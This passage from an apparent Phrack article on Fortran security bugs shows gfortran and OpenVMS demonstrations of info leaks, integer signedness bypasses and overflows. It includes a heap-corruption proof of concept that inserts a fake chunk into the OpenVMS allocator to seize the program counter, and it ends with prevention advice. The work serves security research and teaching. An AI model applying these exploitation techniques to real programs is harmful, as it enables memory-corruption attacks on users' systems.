*** glibc detected *** ./double_free: double free or [...]
[...]
-----END DFREE 1-----
The shit behind ALLOCATE()
---------------------------
We all know that in C allocation of a user supplied size can be dangerous
if not well handled as it can have side effects. Common problems include
too large request which would ultimately result in a NULL being returned or
integer overflows in the calculus of the size.
Since ALLOCATE() is no more than a wrapper of malloc() all of these
problems can occur. However there is an even more vicious one. Let's play a
little bit:
-----BEGIN ALLOCATE-----
$ cat allocate.f90
PROGRAM allocate1
IMPLICIT NONE
INTEGER(1) :: M1
CHARACTER, DIMENSION(:), ALLOCATABLE :: C
write(*,*) 'How much objects should I allocate ?'
read(*,*) M1
ALLOCATE(C(M1))
END PROGRAM
$ gfortran allocate.f90
$ ltrace -e malloc ./a.out
How much objects should I allocate ?
16
malloc(16) <-- Ok = 0x09eed9a0
+++ exited (status 0) +++
$ ltrace -e malloc ./a.out
How much objects should I allocate ?
0
malloc(1) <-- WTF ??? = 0x082a69a0
+++ exited (status 0) +++
$ ltrace -e malloc ./a.out
How much objects should I allocate ?
-20
malloc(1) <-- WTF (again) ??? = 0x089e99a0
+++ exited (status 0) +++
-----END ALLOCATE-----
Wait, something is weird. Why is there a malloc(1)??? A short look at GDB
and we have the following dead listing:
------------------------------------------------------
0x080487fa <+170>: lea eax,[ebp-0x9] ; eax = &M1
0x080487fd <+173>: mov DWORD PTR [esp+0x4],eax
0x08048801 <+177>: mov DWORD PTR [esp+0x8],0x1
0x08048809 <+185>: mov DWORD PTR [esp],ebx
0x0804880c <+188>: call 0x804862c <_gfortran_transfer_integer@plt>
; read(stdin, &M1, 1)
[...]
0x08048819 <+201>: movzx edx,BYTE PTR [ebp-0x9] ; edx = M1
0x0804881d <+205>: mov eax,0x1 ; eax = 1
0x08048822 <+210>: test dl,dl
0x08048824 <+212>: jle 0x8048836 <MAIN__+230> ; if(dl <= 0)
; malloc(eax)
0x08048826 <+214>: mov eax,edx
[...]
0x08048836 <+230>: mov DWORD PTR [esp],eax
0x08048839 <+233>: call 0x804865c <malloc@plt>
[...]
-------------------------------------------------------
So when a null or a negative size is supplied, malloc allocates 1 byte. Why
such a strange behavior? I must confess that I couldn't find any satisfying
answer but the most important thing is: if the user can supply a negative
length then a really tiny allocation is done which is really prone to heap
corruptions. So nice :)
---[ 3.4 - Other interesting bugs
Talking about insecure programming in Fortran would not be complete without
what's following. Despite not being as important, it might become handy in
a few situations.
Uninitialised data
------------------
The first thing to notice is that it's perfectly legal to use variables
without properly initializing them:
-----BEGIN UNINITIALIZED 1-----
$ cat uninitialized.f90
PROGRAM uninitialized
INTEGER :: I, J, XXXX
DO I=0,20
J = J + 1
END DO
write(*,*) J, XXXX
END PROGRAM
$ gfortran uninitialized.f90
$ ./a.out
148818352 -1215630400
$ ./a.out
135645616 -1215855680
-----END UNINITIALIZED 1-----
The compiler did not complain whereas J and XXXX were clearly not properly
set. Thanks to the ASLR we have the proof that there is no default value
which results in an information leak of the stack.
Information leak
----------------
There are a lots of possible situations in which an info leak could occur.
I've found a couple of them and there are probably even more.
*) The (in)direct access to uninitialized data. This situation is the
direct consequence of what was explained previously.
*) As said in Chap 3.1, in a few situations you will be able to control
the index used to access arrays or strings. Now depending on the
nature of the access (read or write) you will either have an info
leak or a memory corruption.
The following example is a perfect illustration:
-----BEGIN LEAK 1-----
$ cat leak1.f90
PROGRAM LEAK
INTEGER :: C(10)
C = Z'41414141'
DO I=0,size(C)-1
write(*,*) C(I)
END DO
END PROGRAM
$ gfortran leak1.f90
$ ./a.out
1 <-- C(0) is out of bounds
1094795585
1094795585
1094795585
1094795585
1094795585
1094795585
1094795585
1094795585
1094795585
$
-----END LEAK 1-----
*) Something which is sometimes not well understood is the string
initialization. This could turn to our advantage :)
-----BEGIN LEAK 2-----
$ cat leak2.f90
PROGRAM leak2
CHARACTER(len=20) :: S
S(1:4) ='AAAA'
write(*,*) S
END PROGRAM
$ gfortran leak2.f90
$ ./a.out
AAAA.... <-- info leak
-----END LEAK 2-----
The mistake in the previous code was to use an index for
initialization purpose. Indeed the proper way would be to do:
S = 'AAAA' which would set the 4 first characters to 'A' and the 16
remaining to ' ' (the space character as there is no use of '\0' in
Fortran).
Note that Phrack publications are intrinsically not compatible with
info leaks due to 7bits ASCII constraints. OK OK lame joke, forgive
me ;-)
---
---[ 4 - Back to the good ol' OpenVMS friend
For the vast majority of post 80s hackers, OpenVMS is without a doubt a
strange beast. It's not UNIX and the DCL syntax seems insane (in fact it is
as it could take you a while to figure out how to change the current path).
But contrary to other old and insanely fucked OS like AIX (hey now you have
a non exec stack! So _impressive_ ... ), it's an interesting challenge to
hack it.
People may argue that it's also so specific that you might never cross one
in your lifetime so why choosing it? Hum. Let's say that:
*) it's not _that_ rare. Though you may probably not see lots of them on
the Internet, there are still a plenty of them in production [R8].
*) it's one of the few platforms really using Fortran nowadays. UNIX
itself though useful for teaching purpose is not representative.
*) both the OS, the architecture (alpha, itanium), and the compiler (HP)
are different. A differential will help us to find out the bug
classes that may be platform dependant.
A recent and interesting blackhat presentation gave the first clues about
how to exploit basic overflows on this OS [R9]. This will not be repeated
though the special case of heap overflow is detailed in Chap 4.2.
Notes:
*) I tried as much as possible not to refer to the Alpha asm as it's
really ugly (and deadlisting are too much verbose unfortunately). The
readers willing to become familiar with this architecture should read
the excellent [R12].
*) If you want to experiment OpenVMS, I recommend you to play with the
excellent "Personal Alpha" which is able to run OpenVMS iso. Another
interesting solution is to play with free shells such as the ones
provided by the Deathrow OpenVMS cluster (thx guyz btw) [R20].
---[ 4.1 - Common Fortran bugs .vs. OpenVMS
Let's get straight to the point: almost every type of bugs presented also
exists with the VMS compiler. However, due to the implementation of the
language, a few differences exist.
Note: The tests were performed on OpenVMS 8.3 (Alpha architecture).
The stack overflow case
-----------------------
Let's play with the (slightly modified) 'CAST 2' example:
-----BEGIN VMS STACK OV 1-----
$ type cast2.f90
SUBROUTINE dump(S)
CHARACTER(len=20) :: S
S = 'AAAA'
write(*,fmt='(A,A)') ' S=',S
END SUBROUTINE
PROGRAM cast2
CHARACTER(len=10) :: X
X = 'ZZZZZZZZZZZ'
write(*,fmt='(A,Z10)') '\&X=', %LOC(X)
CALL dump(X)
END PROGRAM
$ fort cast2
$ lin cast2
$ r cast2
&X= 40000 <-- the local buffer is _not_ on the stack
S=AAAA
-----END VMS STACK OV 1-----
So there is no crash and the local buffer is not a stack buffer. Let's dig
a little bit more with the debugger:
-----BEGIN VMS STACK OV 2-----
$ r /debug cast2
[...]
DBG> go
&X= 40000
S=AAAA
%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
DBG> dump /hex %hex 40000:%hex 40080
20202020 20202020 20202020 41414141 AAAA 0000000000040000
00000000 00000000 00000000 20202020 ............ 0000000000040010
00000000 00000000 00000000 00000000 ................ 0000000000040020
[..]
-----END VMS STACK OV 2-----
OK so there is an overflow since 20 bytes are written but it's _not_ a
'stack' overflow. Troublesome isn't it? Can we exploit it since we cannot
corrupt the saved registers? Hum. I would say that the exploitation of such
a bug is without a doubt heavily dependant of the context. If metadata can
be overwritten then there may be a way to exploit the program, if not it
seems quite unlikely... :<
The implicit typing
-------------------
Let's quote the "HP Fortran for OpenVMS Language Reference Manual":
---
Chap 3.5.1.2 Implicit Typing Rules
"By default, all scalar variables with names beginning with I, J, K, L, M,
or N are assumed to be default integer variables. Scalar variables with
names beginning with any other letter are assumed to be default real
variables. [...]"
---
As a result, if the documentation is correct, there should be an overflow.
Let's verify it:
-----BEGIN IMPLICIT TYPE 3-----
$ type implicit_typing3.f90
SUBROUTINE set(I)
write(*,*) 'How much do u want to read dude ?'
read(*,*) I
END SUBROUTINE
PROGRAM IMPLICIT_TYPING
IMPLICIT NONE
INTEGER(1) :: A, B
A = 0
B = 0
write(*,fmt='(A,Z10),(A,Z20)') ' A=',A , '\&A=', %LOC(A)
write(*,fmt='(A,Z10),(A,Z20)') ' B=',B , '\&B=', %LOC(B)
CALL set(B)
B = B + 140
write(*,*) 'A=',A,'B=',B
END PROGRAM
$ fort implicit_typing
$ lin implicit_typing
$ r /debug implicit_typing
[...]
DBG> go
A= 0
&A= 40008 [L1]
B= 0
&B= 40000 [L2]
How much do u want to read dude ?
2147483647
A= 0 B= -117 [L3]
%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
DBG> dump /hex %hex 40000 : %hex 40010
00000000 00000000 00000000 7FFFFF8B ................ 0000000000040000 [L4]
00000000 .... 0000000000040010
-----END IMPLICIT TYPE 3-----
*) Since &A - &B = 8, an overflow of at least 9 bytes would be required
to corrupt A from B ([L1],[L2]).
*) The memory dump proves that the implicit behavior is exactly what is
described in the reference manual [L4].
*) Unless the compiler was smart enough to allocate space on the stack
to prepare the manipulation in set(), there is clearly an overflow
as B is definitely a 1 byte buffer in the MAIN_() [L3].
The signedness issue
--------------------
As stated earlier, Fortran's integers are signed which means that it's not
possible to have signedness bugs unless there is a cast induced by an
external function call.
Let's see a short example using the LIB$MOVC3() function wich is similar to
the memcpy() from libc:
-----BEGIN SIGNED 1-----
SUBROUTINE copy(S,L)
INTEGER(2) L
CHARACTER D(80) ! Destination buffer
CHARACTER*(*) S
write(*,fmt='(A,Z10),(A,Z20)') ' Len=',L , '\&Len=', %LOC(L)
write(*,fmt='(A,Z10),(A,Z20)') '\&D=', %LOC(D), '\&S=',%LOC(S)
! This C function will perform the copy
CALL LIB$MOVC3(L,%REF(S),%REF(D)) [L2]
write(*,*) 'D is ', D
END SUBROUTINE
PROGRAM CMOOV
CHARACTER(16) Guard0
CHARACTER(80) S
CHARACTER(16) Guard1
INTEGER(2) length
write(*,fmt='(A,Z10)') '\&Guard0=',%LOC(Guard0)
write(*,fmt='(A,Z10)') '\&Guard1=',%LOC(Guard1)
write(*,*) '1. Buffer string?'
read(*,*) S
write(*,*) '2. String len?'
read(*,*) length
! Secure check
IF (length .gt. 80) THEN [L1]
write(*,*) 'S is too long man ...', length
STOP
END IF
DO I=1,len(Guard0)
Guard0(I:I) = 'Y'
Guard1(I:I) = 'Z'
END DO
write(*,*) '3. Copying ... '
CALL copy(S,MIN(len_trim(S),length))
END PROGRAM
-----END SIGNED 1-----
*) A security check is performed in [L1]. However due to the signedness
issue, a user may be able to bypass it by suppling a negative value.
*) The copy function is called with the negative size [L2].
As expected, LIB$MOVC3() implicitly castes the integer as unsigned and if a
negative length is supplied, a crash occurs.
-----BEGIN SIGNED 2-----
$ r /debug MOVC3
[...]
DBG> go
&Guard0= 40068
&Guard1= 40058
1. Buffer string?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2. String len?
16 <-- let's first copy 16 bytes
3. Copying ...
Len= 10
&Len= 7AE3DA58 <-- stack address
&D= 40000 <-- global data address
&S= 40078 <-- global data address
D is AAAAAAAAAAAAAAAA <-- copy was successful
%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
DBG> dump /hex %hex 40000:%hex 40100
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040000
00000000 00000000 00000000 00000000 ................ 0000000000040010
00000000 00000000 00000000 00000000 ................ 0000000000040020
00000000 00000000 00000000 00000000 ................ 0000000000040030
00000000 00000000 00000000 00000000 ................ 0000000000040040
5A5A5A5A 5A5A5A5A 00000000 00000010 ........ZZZZZZZZ 0000000000040050
59595959 59595959 5A5A5A5A 5A5A5A5A ZZZZZZZZYYYYYYYY 0000000000040060
41414141 41414141 59595959 59595959 YYYYYYYYAAAAAAAA 0000000000040070
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040080
20202020 20202020 41414141 41414141 AAAAAAAA 0000000000040090
20202020 20202020 20202020 20202020 00000000000400A0
20202020 20202020 20202020 20202020 00000000000400B0
00000000 00000000 20202020 20202020 ........ 00000000000400C0
00000000 00000000 00000000 00000000 ................ 00000000000400D0
00000000 00000000 00000000 00000000 ................ 00000000000400E0
00000000 00000000 00000000 00000000 ................ 00000000000400F0
00000000 .... 0000000000040100
[...]
DBG> go
&Guard0= 40068
&Guard1= 40058
1. Buffer string?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2. String len?
-1
3. Copying ...
Len= FFFF <--- We are requesting a 65535 bytes copy
&Len= 7AE3DA58
&D= 40000
&S= 40078
%SYSTEM-F-ACCVIO, access violation, reason mask=00,
virtual address=0000000000042000, PC=FFFFFFFF80C85234, PS=0000001B
[...]
DBG> dump /hex %hex 40000:%hex 40100
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040000
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040010
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040020
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040030
41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 0000000000040040
00000000 00000000 00000000 00000000 ................ 0000000000040050
00000000 00000000 00000000 00000000 ................ 0000000000040060
00000000 00000000 00000000 00000000 ................ 0000000000040070
00000000 00000000 00000000 00000000 ................ 0000000000040080
00000000 00000000 00000000 00000000 ................ 0000000000040090
00000000 00000000 00000000 00000000 ................ 00000000000400A0
00000000 00000000 00000000 00000000 ................ 00000000000400B0
00000000 00000000 00000000 00000000 ................ 00000000000400C0
00000000 00000000 00000000 00000000 ................ 00000000000400D0
00000000 00000000 00000000 00000000 ................ 00000000000400E0
00000000 00000000 00000000 00000000 ................ 00000000000400F0
00000000 .... 0000000000040100
-----END SIGNED 2-----
Comparing the difference between both executions, it's easy to see that the
overflow was effective as Guard0, Guard1, S and even length were
overwritten. The crash occurs during the copy because of the guard page
located at 0x42000 (the page is not mmaped). This case is probably not
exploitable but is sufficient to prove the reality of signedness bugs on
a VMS environnement.
Is such a situation likely to happen? Fortunately, yes. Indeed, HP is nice
enough to make easy the use of the VMS API in every supported language. For
example you will see countless examples in the official documentation
explaining how to call VMS functions when programming in Fortran, VAX asm,
C, etc. A bit of googling confirmes it.
---[ 4.2 - Playing with the heap
Like I said before, OpenVMS developers usually tend (even in Fortran) to
use the VMS native RTL API which is far more granular than the classical C
malloc/free functions [R13]. However, ALLOCATE() and DEALLOCATE() could be
chosen for portability purpose which is why we focus on them in this study.
What will be shown below are the global algorithms behind malloc/free and
ALLOCATE/DEALLOCATE as they are almost the same (if not exactly the same).
More generally, it is believed that this result could easily be transposed
to the VMS kernel heap [R14] though the adaptation itself is left as an
exercise for the reader.
Understanding the VMS malloc/free API
-------------------------------------
Unallocated memory is grouped into "bins" of (almost) similar sizes,
implemented by using a single-linked list of chunks (with a pointer stored
in the unallocated space inside the chunk) as illustrated below:
+-------+ +-------+ +-------+
| Bin X |---->| Chunk |---->| 0x0 |
+-------+ +-------+ +-------+
| ... |
+-------+ +-------+ +-------+ +-------+ +-------+
| Bin Y |---->| Chunk |---->| Chunk |---->| Chunk |---->| 0x0 |
+-------+ +-------+ +-------+ +-------+ +-------+
| ... |
+-------+ +-------+
| Bin Z |---->| 0x0 |
+-------+ +-------+
In this particular case, at least 4 free() have already been performed. Now
let's have a look at the chunk 'returned' by malloc():
4 bytes
<------------------------------------->
<-------->
1 byte
chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| SIZE |
+-------------------------------------+
| tag = 0xF00D | Bin_ID | 0x00 |
mem -> +-------------------------------------+
| |
. .
. DATA .
. .
| |
+ + + + + + + + + + + + + + + + + + + +
With :
*) SIZE: the size of the chunk in bytes. It may be rounded.
*) 0xF00D: a tag which indicates that the chunk is allocated.
*) Bin_ID: The ID of the Bin corresponding to the allocated SIZE.
*) mem: the pointer returned by malloc() or ALLOCATE().
If the user performs a free() or a DEALLOCATE() on this chunk, a slight
modification occurs:
4 bytes
<------------------------------------->
<-------->
1 byte
chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| SIZE |
+-------------------------------------+
| tag = 0x7777 | Bin_ID | 0x00 |
mem -> +-------------------------------------+
| NEXT_MEM |
+-------------------------------------+
| |
. .
. free (uncleaned) space .
. .
| |
+ + + + + + + + + + + + + + + + + + + +
With:
*) SIZE and Bin_ID being unchanged.
*) 0x7777: a tag indicating that the chunk is not allocated anymore.
*) NEXT_MEM: a pointer to the next chunk's mem of the same bin. It can
be the NULL pointer if there is no more free chunks in the list.
Note: It may sound silly not to point to the next 'chunk' directly but
that's how things are done friends.
The free() algorithm is somewhat basic and can essentially be described
using the following pseudo code:
-----BEGIN free()-----
free(void *p):
CHUNK *c, *head;
c = chunk_from_mem(p);
c->tag = 0x7777;
head = get_head_from_chunk(c); [L1]
c->NEXT_MEM = head->first; [L2]
head->first = c; [L3]
-----END free()-----
So in the end, a free() is 'almost' equivalent to an element insertion in a
single list. In practice, the real allocator may well be a bit more complex
as I didn't investigate the chunks splitting/fusion mechanisms (if any).
Note that a free()ed chunk will become the first of the corresponding
single chained list, something to keep in mind.
The malloc() function is pretty straightforward:
-----BEGIN malloc()-----
void *malloc(size_t s):
CHUNK *c, *head;
size_t s_new = ROUND(s);
head = get_head_from_size(s_new); [M1]
if(!head->first)
{
[...]
}
c = head->first; [M2]
c->tag = 0xF00D; [M3]
head->first = c->NEXT_MEM; [M4]
return (mem_from_chunk(c));
-----END malloc()-----
A malloc() is the removal of a chunk from the corresponding chained list.
Note that the first chunk of the list will be the first to be removed. If
the list is empty, a special treatment is performed but we don't care about
that.
Taking advantage of the overflow
--------------------------------
Exploiting an heap overflow can be done using at least two techniques:
*) The (partial) overwrite of metadata stored on the heap. Depending on
where and how much you can overflow, this might be interesting
especially since function pointers could be stored there.
*) The fake chunk insertion. The idea is to make malloc returning an
address pointing to a chosen area (like the stack). The normal use
of the buffer will then lead to the control of the process.
Since the first technique is no news, let's see how to perform the second
one. In order to do that, we'll play with following C code:
-----BEGIN HEAP VMS 1-----
// Allocation
int *p = malloc(100);
int *q = malloc(100);
memset(p, 0x41, 100);
memset(q, 0x42, 100);
free(q); [N1]
// heap overflow
memcpy(p, user_buff, user_size); [N2]
-----END HEAP VMS 1-----
In order to simplify things, we'll assume that there was no previous
allocation in the same BIN. Let's visualize the heap layout:
Before [N1] Before [N2] After [N2]
[ 00000070 ] [ 00000070 ] [ 00000070 ]
[ f00d3d00 ] [ f00d3d00 ] [ f00d3d00 ]
p -> [ 41414141 ] [ 41414141 ] [ 41414141 ]
[ 41414141 ] [ 41414141 ] [ 41414141 ]
[ 41414141 ] [ 41414141 ] [ 41414141 ]
[ 41414141 ] [ 41414141 ] [ 41414141 ]
[ ... ] [ ... ] [ ... ]
[ 00000070 ] [ 00000070 ] [ 55555555 ]
[ f00d3d00 ] [ 77773d00 ] user -> [ 55555555 ]
q -> [ 42424242 ] [ 00000000 ] supplied [ 00000000 ]
[ 42424242 ] [ 42424242 ] pointer [ 42424242 ]
Now regarding the associated linked list, we have the following evolution:
+------------+ +------------+
1. | Bin 0x3d |---->| 0x00000000 |
+------------+ +------------+
+------------+ +------------+ +------------+
2. | Bin 0x3d |---->| q |---->| 0x00000000 |
+------------+ +------------+ +------------+
+------------+ +------------+ +------------+
3. | Bin 0x3d |---->| q |---->| 0x55555555 |
+------------+ +------------+ +------------+
As a result, the linked list of our bin is corrupted and q->NEXT_MEM is
user supplied. To prove that fact, we can dereference q->NEXT_MEM as it
will lead to a program crash. This is possible thanks to [M4] if two
malloc(100) are performed after the corruption:
-----BEGIN HEAP VMS 2-----
VMS $ r POC
[...]
0000447d0: 41414141 41414141 41414141 41414141
0000447e0: 41414141 41414141 41414141 41414141
0000447f0: 41414141 41414141 41414141 41414141
000044800: 41414141 55555555 55555555 f00d5555 [O1]
000044810: 55555555 42424242 42424242 42424242
000044820: 42424242 42424242 42424242 42424242
000044830: 42424242 42424242 42424242 42424242
000044840: 42424242 42424242 42424242 42424242
[...]
%SYSTEM-F-ACCVIO, access violation, [...] virtual address=0000000055555555
%TRACE-F-TRACEBACK, symbolic stack dump follows
image module routine line rel PC abs PC
LIBRTL 0 000000000000610C FFFFFFFF80C2E10C
LIBRTL ? ?
DECC$SHR_EV56 0 0000000000052710 FFFFFFFF80DDE710
DECC$SHR_EV56 ? ?
POC POC main 4210 00000000000003BC 00000000000203BC
POC POC __main 4128 000000000000006C 000000000002006C
-----END HEAP VMS 2-----
It's interesting to see that _fortunately_ size doesn't matter ;). Indeed
free() is not 'really' looking at what's written in the corrupted chunk's
header [O1] (size, allocation tag, ...). Great for us it makes things even
easier.
However something really important is that the corruption would seemingly
not have been possible if q was allocated as:
*) if q was allocated then it wouldn't be part of the list.
*) and if q was free()ed _after_ the corruption then q->NEXT_MEM would
naturally be overwritten by free().
There might be a way to trick the allocator so that an arbitrary free() is
performed but I couldn't find any way to do that probably because my
knowledge of the allocator algorithm is rather limited.
At that point, we've almost won as we successfully inserted a fake chunk
in the linked list. As a result, writing will be performed at a user
supplied address. However depending on the context, we may or may not be
able to sufficiently control _what_ will be written:
*) If we cannot control the payload then a F00D delivery is still
possible thanks to [M3]. If we can make the program perform the two
necessary allocations, then the program will write 0xF00D at 'addr'
if NEXT_MEM is overwritten with 'addr+2'. If you plan to exploit the
least significant bits of a pointer then you can probably improve the
technique with an F0 overwrite if the data located immediately before
can be partially corrupted.
Note: Starving hackers would probably have thought of turning F00D
into 0D but remember that Alpha is big endian.
*) If we can control the payload, then the best way is probably to
overwrite the PC address saved on the stack (there is no ASLR folks).
Back on our feets [R9]:
-----BEGIN HEAP VMS 3-----
VMS $ type poc.F90
PROGRAM POC
INTEGER(4), POINTER :: P(:)
INTEGER(4), POINTER :: Q(:)
INTEGER(4), POINTER :: M(:)
INTEGER(4), POINTER :: P2(:)
INTEGER(4) :: I
ALLOCATE(P(100))
ALLOCATE(Q(100))
! Debugging purpose
P = 'AAAA'
Q = 'BBBB'
write(*,fmt='(A,Z10)') ' P=',%LOC(P)
write(*,fmt='(A,Z10)') ' Q=',%LOC(Q)
P2 => P
DEALLOCATE(Q)
! Fake heap overflow
P2(101) = Z'55555555'
P2(102) = Z'55555555'
P2(103) = Z'55555555'
P2(104) = Z'55555555'
P2(105) = Z'7AE3D910' + 100 ! fixed to work ;)
write(*,*) "******** AFTER CORRUPTION ************"
ALLOCATE(M(100))
write(*,*) "******** AFTER MALLOC 1 ************"
ALLOCATE(M(100))
write(*,fmt='(A,Z10)') ' FAKE CHUNK AT ',%LOC(M)
! Simulating a user supplied payload
DO I=1,80
M(I) = Z'44444444'
END DO
END PROGRAM
VMS $ FORT poc
VMS $ LIN poc
VMS $ r poc
P= 52008
Q= 521A8
******** AFTER CORRUPTION ************
******** AFTER MALLOC 1 ************
FAKE CHUNK AT 7AE3D974
%SYSTEM-F-ACCVIO, [...] PC=4444444444444444, PS=0000001B
%TRACE-F-TRACEBACK, symbolic stack dump follows
image module routine line rel PC abs PC
0 4444444444444444 4444444444444444
-----END HEAP VMS 3-----
Note: The stack address is hardcoded but this is not a big issue as there
is no ASLR :).
One step further
----------------
OK a few more things and we're done with OpenVMS (anyway at that point
you're probably either sleeping already or reading a much more interesting
article of this issue ;)).
1) I came across this funny thing while reading HP's documentation [R11]:
---
Chap 5.9.5 2-GB malloc No Longer Fails Silently
The C RTL malloc function accepts an unsigned int (size_t) as its
parameter. The LIB$VM_MALLOC action accepts a (positive) signed integer as
its parameter. Allocating 2 GB (0x80000000) did not allocate the proper
amount of memory and did not return an error indication. A check is now
added to the malloc, calloc, and realloc functions for sizes equal to or
greater than 2 GB that fail the call.
---
WOWOWOWO jackpot :) Who said this _could_ have security consequences? ;>
2) I investigated the ALLOCATE(size) issue under OpenVMS Alpha 8.3 and the
result is that if size <= 0 and size >= -0x80000000 then the address 0x100
is returned (if size < -0x80000000 an input conversion occurs
(%FOR-F-INPCONERR)).
Since the 0x100 address is not mmaped, the only way to exploit this
situation would be to dereference the pointer using a sufficiently great
index to access user controlled data. While this is theoretically feasible
since memory regions are mmaped at low addresses, a practical case has yet
to be found.
---
---[ 7 - Prevention: lets use a condom
Now is the time to think about how to avoid security troubles with Fortran
programs. In order to do that, several things (more or less effective) can
be done:
*) A careful review of the source code. Believe me, it's not that easy.
To properly perform that, you have to know the language deeply and
being well aware of its weaknesses. Depending on your level of
mastery, bugs may still be left as Fortran really is a vicious
language. Mastering this paper for example is probably far from
being enough.
*) The study of your Fortran compiler. Try to find what kind of bugs
are likely to be found/exploited with your compiler. A good starting
point is probably to have a look at the "Compiler Diagnostic Test
Sets" project [R17]. Not only will you find accurate information
about several compilers but you will also find new kind of bugs
(though not always security related) as well as a precious test set.
*) Read the manpage of your compiler to see if compile/runtime extra
security checks could be performed. Let me show you an example.
Remember that in Chap 3.1 I gave the following example:
-----BEGIN OVERFLOW 1-----
$ cat overflow1.f90
PROGRAM test
CHARACTER(len=30) :: S ! String of length 30
INTEGER(4) I
S = 'Hello Phrack readers!'
read(*,*) I
S(I:I) = '.'
write(*,*) S
END PROGRAM
$ gfortran overflow1.f90
$ ./a.out
He.lo Phrack readers! <-- S was modified with 0x2E
$ gdb ./a.out
[...]
(gdb) r
Starting program: a.out
50 <-- 50 is clearly out of scope! (>30)
Breakpoint 1, 0x080487be in MAIN__ ()
(gdb) print /d $eax
$1 = 50
(gdb) c
Hello Phrack readers!
Program received signal SIGSEGV, Segmentation fault.
0x2e04885b in ?? () <-- EIP was corrupted with 0x2E
-----END OVERFLOW 1-----
Now let's see what happens when the '-fbounds-check' option is used:
-----BEGIN OVERFLOW 2-----
$ gfortran overflow1.f90 -fbounds-check
$ ./a.out
[Type 50]
At line 7 of file overflow1.f90
Fortran runtime error: Substring out of bounds: upper bound (50) of
's' exceeds string length (30)
$ ./a.out
[Type -1]
At line 7 of file overflow1.f90
Fortran runtime error: Substring out of bounds: lower bound (-1) of
's' is less than one
-----END OVERFLOW 2-----
As expected, the program now includes runtime checks. Depending on
the bug class, the compiler may have a specific option to prevent or
detect it. RTFM.
*) Static analysis. Well to be honest I didn't investigate it at all.
While digging for this article, I came across a couple of opensource
projects as well as commercial implementations (sorry NO ADVERTISING
in PHRACK dudes).
While I didn't test any of them, I can imagine that there may
effective ones as some kind of bugs would really be easy to spot
using for example type checking (first thing that comes to my mind).
Anyway it's just mere speculation. Either test it or forget it. Like
we care anyway.
Sometimes a condom is not enough. The best for you is probably not to use
this insanely fucked language. Once again, who cares about Fortran anyway?
[ http://www.fortranstatement.com/cgi-bin/petition.pl ]
---
---[ 8 - The final words
There would have been a lot more to add (studying other compilers/arch) but
unfortunately time is running out and I would rather not make the paper
more boring than it currently is ;) Anyway as far as I can tell, the
essential is covered and with that in mind and a bit of practice, I expect
you to be able to quickly find new bugs.
Hackers dealing with/busting/exploiting bugs in Fortran programs are
so rare in our World that I bet that none of you had ever heard a word
about Fortran's security issues. Nowadays people are more focused on
languages such as PHP, Java or .NET which is normal for obvious reasons.
Now it doesn't mean that other languages are not interesting too and you
never know when appropriate knowledge becomes handy. History proved that
bugs not always occurred in the 'daily' hacking playground (C/PHP,
Unix/Windows) [R19] so why would we restrain ourselves?
Not convinced? OK allow me to alter the smart thoughts of a fellow p67
writer: "We hack Fortran just because we can. We don't really need a reason
anyway as soon as bugs are there, we are there."
---
---[ 8 - Greetz
My first thoughts are for all talented hackers with whom I had so much to
share all these years. May you guys never lose that spirit of yours nor
your ethics [R15]. Special thanks to the Phrack staff for their help,
advise and review.
Now and because alone life would have no meaning, special thanks to my
friends not only for being there but also for being able to support me
especially when I'm *cranky* as hell :')
Special apologize to the great guys of the FHC (Fortran High Council). Just
for once I wanted to be as cool as king-fag-c0pe though it probably means
that it's a matter of days before witnessing the bust of all cool Fortran
0dayZ on FD :((( Don't be afraid sysadmins, thanx to gg security folks
everything will be done in a 'responsible' way [R16] ;>
Also thanks to all of you who will nominate this paper at the 2011 pwnies
award as the "most innovative research paper" ;>
---
---[ 9 - Bibliography
[R1] http://onepiece.wikia.com/wiki/Buggy
[R2] Fortran90, ISO/IEC 1539
[R3] http://gcc.gnu.org/onlinedocs/gfortran/
[R4] HP Fortran for OpenVMS - Language Reference Manual, HP
[R5] Shifting the Stack Pointer, andrewg, Phrack #63
[R6] Basic Integer Overflows, Blexim, Phrack #60
[R7] http://www.cs.rpi.edu/~szymansk/OOF90/bugs.html
[R8] http://h71000.www7.hp.com/success-stories.html
[R9] Hacking OpenVMS, C. Nyberg, C. Oberg & J. Tusini, Defcon16
[R10] http://www.cisl.ucar.edu/tcg/consweb/Fortran90/scnpoint.html
[R11] HP OpenVMS Version 8.3 Release Notes, HP
[R12] Alpha Assembly Language Guide, R.Bryant, Carnegie Mellon University
[R13] http://labs.hoffmanlabs.com/node/401
[R14] OpenVMS Alpha Internals and Data Structures: Memory Management, HP
[R15] Industry check, ZF0 #5
[R16] http://googleonlinesecurity.blogspot.com/2010/07/rebooting-
responsible-disclosure-focus.html (lol)
[R17] http://ftp.cac.psu.edu/pub/ger/fortran/test/results.txt
[R18] http://www.fortranstatement.com
[R19] http://www5.in.tum.de/persons/huckle//horrorn.pdf
[R20] http://deathrow.vistech.net
---
That is the saving of humor, if you fall no one is laughing at you.
A. Whitney Brown
---